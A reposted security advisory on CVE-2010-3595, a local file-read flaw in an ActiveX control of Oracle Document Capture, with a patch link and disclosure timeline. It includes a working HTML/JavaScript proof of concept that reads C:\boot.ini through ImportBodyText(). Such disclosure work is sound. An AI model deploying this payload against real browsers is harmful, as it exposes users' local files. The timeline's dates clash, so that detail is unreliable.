|
|
|
|
| |
Credit:
The information has been provided by Alexey Sintsov.
The original article can be found at: http://seclists.org/bugtraq/2011/Jan/147
|
| |
Vulnerable Systems:
* Oracle Document Capture 10.1350.0005
The Vulnerable method is "ImportBodyText()".
For example, if you enter filename "C:\\boot.ini" in "ImportBodyText" method then the control will open and read file "C:\boot.ini".
Content of boot.ini will be loaded into property "BodyText" .
Class EasyMailSMTPObj
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}
Number of Interfaces: 1
Default Interface: IEasyMailSMTPObj
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
Example:
*******
<HTML>
<HEAD>
<TITLE>DSECRG</TITLE>
</HEAD>
<BODY>
<OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>
<SCRIPT>
function Exploit(){
ora.ImportBodyText("C:\\boot.ini");
document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
Patch Availability:
All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
CVE Information:
CVE-2010-3595
Disclosure Timeline:
Reported 29.01.2010
Second report 02.02.2010
Date of Public Advisory 24.01.2010
|
|
|
|
|
